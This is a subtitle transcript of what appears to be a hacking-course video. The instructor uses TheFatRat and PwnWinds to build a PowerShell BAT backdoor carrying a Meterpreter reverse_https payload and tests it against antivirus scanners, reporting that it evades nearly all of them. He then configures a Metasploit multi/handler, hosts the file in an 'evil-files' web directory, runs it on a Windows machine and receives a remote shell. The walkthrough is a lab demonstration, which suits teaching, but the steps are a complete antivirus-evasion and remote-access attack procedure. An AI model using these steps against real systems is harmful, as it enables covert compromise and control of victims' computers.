1
00:00:00,600 --> 00:00:06,940
Okay, now that we have TheFatRat loaded, let's see how we can use it to generate an undetectable backdoor.
2
00:00:07,660 --> 00:00:13,520
Now you can see the tool can be used to do many more things, like it creates a backdoor for Android
3
00:00:13,520 --> 00:00:18,620
and combines a backdoor with another file, but we're not going to be talking about that now.
4
00:00:18,620 --> 00:00:20,800
We're gonna go over that later on in the course.
5
00:00:21,020 --> 00:00:25,460
But for now we're interested in creating an undetectable backdoor.
6
00:00:26,240 --> 00:00:32,280
And the one I'm gonna use is creating one with PwnWinds, which actually uses PowerShell.
7
00:00:33,020 --> 00:00:38,840
So this is number '06' right here, so all I have to do is just enter '06' or '6'
8
00:00:40,640 --> 00:00:46,320
and that will take me to PwnWinds, which gives me even more options to generate the backdoor.
9
00:00:48,240 --> 00:00:51,200
Now the backdoor generated with this uses PowerShell
10
00:00:51,600 --> 00:00:55,080
and PowerShell is basically a framework made by Windows,
11
00:00:55,400 --> 00:00:59,480
which kind of expands on the basic DOS commands.
12
00:00:59,740 --> 00:01:04,580
So it basically gives you more shell commands that can be used to automate tasks
13
00:01:04,580 --> 00:01:07,460
and run things on Windows Operating Systems.
14
00:01:08,060 --> 00:01:12,680
PowerShell comes pre-installed on all Windows machines after Windows 7.
15
00:01:13,120 --> 00:01:17,100
So you can guarantee that it's going to work on all Windows computers,
16
00:01:17,100 --> 00:01:19,160
if they're running Windows 7 and up.
17
00:01:21,080 --> 00:01:24,760
I'm gonna 'Create a bat', which is an executable type
18
00:01:25,100 --> 00:01:30,680
and that's gonna use PowerShell to inject the backdoor and give us the Reverse Shell.
19
00:01:31,200 --> 00:01:36,480
The other options will still use PowerShell, but will create a slightly different backdoor.
20
00:01:36,500 --> 00:01:41,540
For example, you can see this one will attempt to embed the backdoor with a PDF
21
00:01:41,540 --> 00:01:43,320
but it won't work against all systems.
22
00:01:43,740 --> 00:01:47,560
You'll see that this one will use 'C', this one will use 'Apache',
23
00:01:47,820 --> 00:01:53,960
this one will use 'C#', but for ours, we're just going to use a basic BAT file with PowerShell
24
00:01:53,960 --> 00:01:57,180
and it should be able to bypass antivirus programs.
25
00:01:58,040 --> 00:02:02,200
So I'm gonna go with number '1', which uses a bat file with PowerShell,
26
00:02:02,460 --> 00:02:06,500
and the reason why I'm going with it is because I've actually already tested the others
27
00:02:06,500 --> 00:02:12,560
and they get detected by at least one antivirus program, so I'm gonna go with number '1'.
28
00:02:13,240 --> 00:02:17,160
And then you can see that the tool is really nice because it already tells us
29
00:02:17,160 --> 00:02:24,500
our local IP, our real IP and our hostname. Now, we'll talk about the real IP and all of that later on.
30
00:02:24,820 --> 00:02:30,300
For now, all that we're interested in is our local IP, and when we were using Veil,
31
00:02:30,300 --> 00:02:34,020
we had to run 'ifconfig' to see what our local IP is.
32
00:02:34,660 --> 00:02:40,060
So remember we had to split the screen and do 'ifconfig'
33
00:02:41,680 --> 00:02:46,020
and then we can see that our local IP is '10.20.14.213'.
34
00:02:46,700 --> 00:02:51,180
But in here it's actually given a start already, so we can just give it straight away
35
00:02:51,560 --> 00:02:53,909
and we don't have to do 'set'. So remember, with Veil,
36
00:02:53,909 --> 00:02:56,580
we had to say set something equals something and all that.
37
00:02:56,860 --> 00:03:00,140
For now we can just give it the IP straight away.
38
00:03:00,720 --> 00:03:07,020
So it's asking for the 'LHOST', which is my local IP and that's '10.20.14.213'
39
00:03:09,060 --> 00:03:13,160
and then it's asking me for the port to be used for the reverse connection
40
00:03:13,500 --> 00:03:15,540
and I'm going to set that to 8080
41
00:03:17,620 --> 00:03:27,560
and then it's asking me what do I want to call the file and I'm just gonna call it 'rev_https_8080_'
42
00:03:28,040 --> 00:03:33,340
and I'm gonna put 'fr' at the end for FatRat so we know that this was generated using TheFatRat.
43
00:03:34,300 --> 00:03:35,580
So I'm gonna hit 'Enter'
44
00:03:36,580 --> 00:03:40,520
and then it's gonna ask me what type of Payload do I want to use.
45
00:03:41,060 --> 00:03:46,660
So if you look at these, you'll see that they're actually kind of similar to the Payloads in Veil-Evasion.
46
00:03:47,120 --> 00:03:50,480
Especially the last parts, so you can see that we have 'Meterpreter payloads'
47
00:03:51,000 --> 00:03:58,120
and you can see that we have a 'reverse_tcp' and we have a 'reverse_http' and if we scroll down,
48
00:03:58,120 --> 00:04:04,760
we have the 'meterpreter_reverse_https', which is the same payload that we used with Veil-Evasion.
49
00:04:06,200 --> 00:04:11,320
So again, essentially, we're generating the exact same payload which is gonna give us
50
00:04:11,320 --> 00:04:13,580
the exact same access to the computer.
51
00:04:14,000 --> 00:04:17,840
The only difference is the way that this payload is going to be delivered
52
00:04:17,840 --> 00:04:20,360
and executed on the target computer.
53
00:04:22,300 --> 00:04:26,300
So I'm gonna click on 'OK' and again just like Veil-Evasion,
54
00:04:26,300 --> 00:04:31,060
TheFatRat will actually use the 'Metasploit' framework to generate the payload.
55
00:04:33,740 --> 00:04:41,200
And now it's telling me that the payload is saved to the output folder, and that's it. It's asking me do I want to 'Exit'
56
00:04:41,200 --> 00:04:43,280
and I'm gonna say 'Yes', I'm done with you, thank you.
57
00:04:45,320 --> 00:04:48,640
And that's it, we're out of TheFatRat.
58
00:04:49,220 --> 00:04:51,460
Now what I wanna do is I wanna just check
59
00:04:51,460 --> 00:04:55,500
and make sure that this backdoor is not detected by any antivirus programs.
60
00:04:56,380 --> 00:04:59,520
So I'm gonna go down and I'm gonna go on my browser.
61
00:05:01,680 --> 00:05:03,060
I'm gonna upload a file
62
00:05:04,800 --> 00:05:11,600
and the file is going to be stored in the output of TheFatRat.
63
00:05:11,600 --> 00:05:18,880
So as you remember, TheFatRat was stored in 'opt', so I'm actually just clicking on the pen here.
64
00:05:18,940 --> 00:05:23,880
And then I'm gonna give the full access to the full path where the backdoor is stored
65
00:05:24,280 --> 00:05:28,740
and it starts in the same location where we created-- where we installed TheFatRat.
66
00:05:28,960 --> 00:05:34,560
So that was in '/opt/TheFatRat', if you remember
67
00:05:34,560 --> 00:05:37,940
and you can see that we have all the files of TheFatRat right here.
68
00:05:38,260 --> 00:05:44,160
Now if we go to 'output', there should be a file called 'output' and that's it right here.
69
00:05:44,980 --> 00:05:52,420
And in it, we have our backdoor, which is called 'rev_https_8080_fr.bat'.
70
00:05:53,520 --> 00:05:57,260
I'm gonna 'Open' this file and 'Scan' it
71
00:05:59,340 --> 00:06:06,120
and as you can see the scan is done and it's only being detected by one antivirus program.
72
00:06:06,760 --> 00:06:12,700
So it's actually bypassing pretty much all the famous antivirus programs: it's bypassing McAfee,
73
00:06:12,960 --> 00:06:21,400
it's bypassing Kaspersky, it's bypassing AVG, it's bypassing Norton right here.
74
00:06:21,760 --> 00:06:27,780
It's pretty much bypassing everything; the only one that's detecting it is IKARUS security.
75
00:06:29,120 --> 00:06:33,520
So out of all the antivirus programs, we'll be able to bypass them all,
76
00:06:33,520 --> 00:06:37,820
except for this particular antivirus program, which is a really, really good result.
77
00:06:39,200 --> 00:06:45,920
So I'm gonna go back and we're gonna test the backdoor exactly the same way we tested our Veil backdoor.
78
00:06:46,280 --> 00:06:51,080
So the first thing we're gonna do is we're gonna listen for incoming connections using 'msfconsole'
79
00:06:52,540 --> 00:06:56,980
and we're gonna use the multi handler exactly the same way that we used it before.
80
00:06:57,560 --> 00:07:01,880
Keep in mind that it doesn't matter how we created the payload; both of these payloads use
81
00:07:01,880 --> 00:07:04,520
a 'Meterpreter_reverse_http' connection.
82
00:07:05,020 --> 00:07:10,140
Therefore, when we want to listen for incoming connections, we're gonna use the same module
83
00:07:10,140 --> 00:07:11,280
and the same payload.
84
00:07:11,940 --> 00:07:15,500
So I'm gonna do this a bit quickly because we have done it and explained it before.
85
00:07:15,920 --> 00:07:19,100
So the first thing I'm gonna do is 'use exploit/multi/handler'.
86
00:07:21,280 --> 00:07:22,880
Then I'm gonna set the payload
87
00:07:23,880 --> 00:07:29,340
and I have to set this exactly to the same payload that I created that I want to receive connections from.
88
00:07:29,820 --> 00:07:33,200
And we created a 'meterpreter_reverse_http' payload.
89
00:07:33,600 --> 00:07:41,680
So that's what we're gonna set it to: 'windows/meterpreter/reverse_https'
90
00:07:43,520 --> 00:07:47,300
and then we're gonna set the 'LHOST' to the IP address of my machine.
91
00:07:47,300 --> 00:07:50,880
Again, the same 'LHOST' that we set when we created the backdoor.
92
00:07:52,360 --> 00:07:57,240
And we're gonna set the 'LPORT' to the port that we want to receive the connection from
93
00:07:57,240 --> 00:08:02,060
and again the same 'LPORT' that we used when we created the backdoor, so it's 8080.
94
00:08:03,280 --> 00:08:08,600
And now all is done. I'm just gonna do 'show options' just to make sure everything is okay
95
00:08:08,600 --> 00:08:12,060
and we can see that we're using 'windows/meterpreter/reverse_https'.
96
00:08:12,780 --> 00:08:17,600
We have the right IP and we have the right port, so everything is perfect.
97
00:08:17,940 --> 00:08:21,400
Now I'm actually just gonna run one command before I run this exploit.
98
00:08:21,400 --> 00:08:27,320
I'm gonna do 'save' and what this will do is it's gonna save all this config automatically,
99
00:08:27,320 --> 00:08:33,660
so that the next time I run 'msfconsole', I'll have the multi handler loaded already
100
00:08:33,820 --> 00:08:38,960
and it will have all these options pre-configured automatically, so I won't have to do it again.
101
00:08:39,940 --> 00:08:48,660
And now I'm just gonna do 'exploit' to run this module and wait for incoming connections on 8080.
102
00:08:48,960 --> 00:08:53,520
The last step to do now is to just run the backdoor on my Windows machine
103
00:08:53,980 --> 00:08:57,220
and I'm gonna deliver it using our very basic delivery method
104
00:08:58,000 --> 00:09:04,320
and that's basically by placing our backdoor in our Web server
105
00:09:04,680 --> 00:09:07,860
and then we're going to download it from the Windows machine.
106
00:09:08,780 --> 00:09:17,220
So my backdoor is right here, I'm gonna 'copy' it and I'm gonna click on the address bar again,
107
00:09:17,220 --> 00:09:28,580
put a forward slash and then put 'var/www/html/', and we created a directory called 'evil-files'
108
00:09:30,160 --> 00:09:35,140
that we stored our previous backdoor in and I'm gonna paste this backdoor in it
109
00:09:37,020 --> 00:09:38,732
and that's it, we're good to go.
110
00:09:38,740 --> 00:09:43,380
So we're just going to download it from the Windows machine, like we did in the previous video.
111
00:09:43,800 --> 00:09:48,480
And before I can download it, I need to start the Apache server, the web server in Kali
112
00:09:48,660 --> 00:09:52,200
and we're gonna do that using the 'service' command
113
00:09:52,740 --> 00:09:54,280
to start Apache.
114
00:09:58,060 --> 00:09:59,880
So I'm gonna go to my Windows machine
115
00:10:02,040 --> 00:10:09,460
and I'm gonna navigate to my website, which is '10.20.14.213', the same IP as the Kali IP,
116
00:10:09,460 --> 00:10:14,300
and we're gonna go to the directory that contains the evil files which is called 'evil-files'.
117
00:10:15,900 --> 00:10:19,300
And we can see our two backdoors: we see the one that we used before
118
00:10:19,680 --> 00:10:24,540
and we have our new backdoor here which is called 'rev_https_8080_fr',
119
00:10:25,420 --> 00:10:31,600
I'm going to click that, 'Download' it and then I'm gonna run it
120
00:10:33,280 --> 00:10:37,980
and again, Windows is just telling me be careful, this is an executable,
121
00:10:37,980 --> 00:10:42,200
so be careful when you run files like this. It's not telling me that it's a virus
122
00:10:42,580 --> 00:10:47,040
and it's not telling me that it contains malware, so I'm gonna run it anyway.
123
00:10:50,600 --> 00:10:52,680
And if we come back here,
124
00:10:54,660 --> 00:10:57,300
you'll see that we got a 'Meterpreter Shell'
125
00:10:58,860 --> 00:11:05,140
and the connection came back again from the target computer, which is at '10.20.14.206',
126
00:11:05,140 --> 00:11:07,880
came back to us on Port 8080.
127
00:11:09,080 --> 00:11:15,920
Now, like I said before, I basically hacked the Windows machine; I can do anything I want to do on it.
128
00:11:16,120 --> 00:11:18,180
So if I just do 'sysinfo' to confirm,
129
00:11:21,320 --> 00:11:24,620
you can see we can get the information about that machine
130
00:11:24,620 --> 00:11:29,180
and we can basically do anything that the target person can do on their computer.